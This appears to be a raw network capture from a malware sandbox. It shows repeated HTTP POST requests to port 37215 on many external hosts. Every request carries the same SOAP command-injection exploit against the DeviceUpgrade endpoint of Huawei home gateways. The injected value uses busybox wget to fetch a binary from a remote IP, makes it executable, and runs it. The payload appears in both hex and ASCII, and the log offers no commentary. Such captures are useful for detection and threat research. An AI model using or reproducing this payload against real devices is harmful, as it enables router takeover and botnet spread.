                                                                      Aug 2, 2024 13:18:29.478615046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      18192.168.2.1455526197.82.157.22137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.639254093 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.202089071 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.874257088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.186096907 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.841995001 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:14.217791080 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:24.713428020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:46.472492933 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:29.478615046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      19192.168.2.1453114102.29.137.17737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.642538071 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
